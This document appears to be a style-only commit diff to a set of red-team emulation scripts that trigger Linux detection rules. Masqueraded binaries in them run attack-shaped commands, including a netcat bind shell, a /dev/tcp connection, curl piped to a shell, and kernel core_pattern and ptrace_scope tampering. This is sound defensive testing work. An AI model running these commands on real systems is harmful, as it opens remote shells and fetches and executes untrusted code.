Sync RTA Attempt to Fix Sensor Regex Error (#4213)

rta/linux_command_and_control_cupsd_foomatic_rip_netcon.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -21,27 +22,18 @@ metadata = RtaMetadata(
 
 @common.requires_os(*metadata.platforms)
 def main() -> None:
-    # Path for the fake executable
+    # Path for the fake motd executable
     masquerade = "/tmp/foomatic-rip"
     source = common.get_path("bin", "netcon_exec_chain.elf")
 
-    common.log("Creating a fake executable..")
+    common.log("Creating a fake motd executable..")
     common.copy_file(source, masquerade)
     common.log("Granting execute permissions...")
-    common.execute(['chmod', '+x', masquerade])
+    common.execute(["chmod", "+x", masquerade])
 
-    # Execute the fake executable
-    common.log("Executing the fake executable..")
-    commands = [
-        masquerade,
-        'chain',
-        '-h',
-        '8.8.8.8',
-        '-p',
-        '53',
-        '-c',
-        '/tmp/foomatic-rip netcon -h 8.8.8.8 -p 53'
-    ]
+    # Execute the fake motd executable
+    common.log("Executing the fake motd executable..")
+    commands = [masquerade, "chain", "-h", "8.8.8.8", "-p", "53", "-c", "/tmp/foomatic-rip netcon -h 8.8.8.8 -p 53"]
     common.execute([*commands], timeout=5, kill=True)
 
     # Cleanup

rta/linux_command_and_control_curl_wget_hidden_directory_output.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(

rta/linux_defense_evasion_lolbin_so_load.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade])
 
-    commands = [masquerade, 'cdll.LoadLibrary.so']
+    commands = [masquerade, "cdll.LoadLibrary.so"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_defense_evasion_process_masquerading_via_exec.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(

rta/linux_defense_evasion_proxy_execution_via_crash.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -35,7 +36,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade2])
 
-    commands = [masquerade, '-h', masquerade, '-c', 'whoami']
+    commands = [masquerade, "-h", masquerade, "-c", "whoami"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_defense_evasion_proxy_execution_via_ld_so.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -35,7 +36,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade2])
 
-    commands = [masquerade, masquerade, '-c', 'whoami']
+    commands = [masquerade, masquerade, "-c", "whoami"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_defense_evasion_proxy_execution_via_php.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -35,7 +36,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade2])
 
-    commands = [masquerade, '-r', masquerade2, '-c', 'whoami']
+    commands = [masquerade, "-r", masquerade2, "-c", "whoami"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_defense_evasion_proxy_execution_via_pidstat.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -35,7 +36,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade2])
 
-    commands = [masquerade, '-e', masquerade, '-c', 'whoami']
+    commands = [masquerade, "-e", masquerade, "-c", "whoami"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_defense_evasion_proxy_execution_via_sed.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -35,7 +36,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade2])
 
-    commands = [masquerade, '-n', masquerade, '-c', 'whoami']
+    commands = [masquerade, "-n", masquerade, "-c", "whoami"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_defense_evasion_proxy_execution_via_split.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -35,7 +36,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade2])
 
-    commands = [masquerade, masquerade, '--filter=foo', '-c', 'whoami']
+    commands = [masquerade, masquerade, "--filter=foo", "-c", "whoami"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_defense_evasion_proxy_execution_via_sysctl.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -35,7 +36,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade2])
 
-    commands = [masquerade, masquerade, 'kernel.core_pattern=/bin/sh -c']
+    commands = [masquerade, masquerade, "kernel.core_pattern=/bin/sh -c"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_defense_evasion_proxy_execution_via_tcpdump.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade])
 
-    commands = [masquerade, '-W', '-w', '-z']
+    commands = [masquerade, "-W", "-w", "-z"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_defense_evasion_shebang_decoded_via_builtin_utility.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade])
 
-    commands = [masquerade, '-d', 'IyEvdXNyL2Jpbi9weXRob24']
+    commands = [masquerade, "-d", "IyEvdXNyL2Jpbi9weXRob24"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_defense_evasion_sysctl_kernel_feature_activity.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade])
 
-    commands = [masquerade, "--write", '/proc/sys/kernel/yama/ptrace_scope']
+    commands = [masquerade, "--write", "/proc/sys/kernel/yama/ptrace_scope"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_execution_bind_shell_via_nc_traditional.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade])
 
-    commands = [masquerade, '-e', '-l', '-p', '/bin/sh']
+    commands = [masquerade, "-e", "-l", "-p", "/bin/sh"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_execution_bind_shell_via_node.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade])
 
-    commands = [masquerade, '-e', 'spawnsh', 'listen']
+    commands = [masquerade, "-e", "spawnsh", "listen"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_execution_bind_shell_via_socket.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade])
 
-    commands = [masquerade, '-s', '-p', 'sh']
+    commands = [masquerade, "-s", "-p", "sh"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_execution_cupsd_foomatic_rip_shell_execution.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -35,7 +36,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade2])
 
-    commands = [masquerade, masquerade2, '-c', 'whoami']
+    commands = [masquerade, masquerade2, "-c", "whoami"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_execution_cupsd_foomatic_rip_suspicious_child_execution.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(

rta/linux_execution_gsocket_activity.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade])
 
-    commands = [masquerade, 'gs-netcat']
+    commands = [masquerade, "gs-netcat"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_execution_linux_powershell_outbound_network_connection.py

@@ -3,8 +3,8 @@
 # 2.0; you may not use this file except in compliance with the Elastic License
 # 2.0.
 
-import sys
 import subprocess
+import sys
 import time
 
 from . import RtaMetadata, common
@@ -29,22 +29,22 @@ def main() -> None:
     network_command = "exec 3<>/dev/tcp/8.8.8.8/53"
 
     # Create the fake parent process script
-    with open(parent_process_path, "w") as parent_script:
+    with open(parent_process_path, "w") as parent_script:  # noqa: PTH123
         parent_script.write("#!/bin/bash\n")
         parent_script.write(f"{child_script_path}\n")
 
     # Create the child script that will make the network connection
-    with open(child_script_path, "w") as child_script:
+    with open(child_script_path, "w") as child_script:  # noqa: PTH123
         child_script.write("#!/bin/bash\n")
         child_script.write(f"{network_command}\n")
 
     # Make the scripts executable
-    common.execute(['chmod', '+x', parent_process_path])
-    common.execute(['chmod', '+x', child_script_path])
+    common.execute(["chmod", "+x", parent_process_path])
+    common.execute(["chmod", "+x", child_script_path])
 
     # Execute the parent process script
     common.log("Executing the fake parent process script")
-    subprocess.Popen([parent_process_path])
+    subprocess.Popen([parent_process_path])  # noqa: S603
 
     # Allow some time for the network connection to be attempted
     time.sleep(5)

rta/linux_execution_reverse_or_bind_shell_via_utility.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade])
 
-    commands = [masquerade, '-c', "socket"]
+    commands = [masquerade, "-c", "socket"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_impact_enable_write_access_to_msr.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade])
 
-    commands = [masquerade, 'msr', "allow_writes=on"]
+    commands = [masquerade, "msr", "allow_writes=on"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_persistence_webserver_curl_wget_download_ip_args.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade])
 
-    commands = [masquerade, '-c', 'curl http://8.8.8.8:53 --output']
+    commands = [masquerade, "-c", "curl http://8.8.8.8:53 --output"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_persistence_webserver_curl_wget_piped_to_interpreter.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade])
 
-    commands = [masquerade, '-c', 'curl http://8.8.8.8:53/foo | /tmp/sh']
+    commands = [masquerade, "-c", "curl http://8.8.8.8:53/foo | /tmp/sh"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)

rta/linux_persistence_webserver_curl_wget_suspicious_redirect.py

@@ -4,6 +4,7 @@
 # 2.0.
 
 import sys
+
 from . import RtaMetadata, common
 
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
     common.log("Granting execute permissions...")
     common.execute(["chmod", "+x", masquerade])
 
-    commands = [masquerade, '-c', 'curl http://8.8.8.8:53/foo > /tmp/foo && xxd']
+    commands = [masquerade, "-c", "curl http://8.8.8.8:53/foo > /tmp/foo && xxd"]
     common.execute([*commands], timeout=5, kill=True)
     common.log("Cleaning...")
     common.remove_file(masquerade)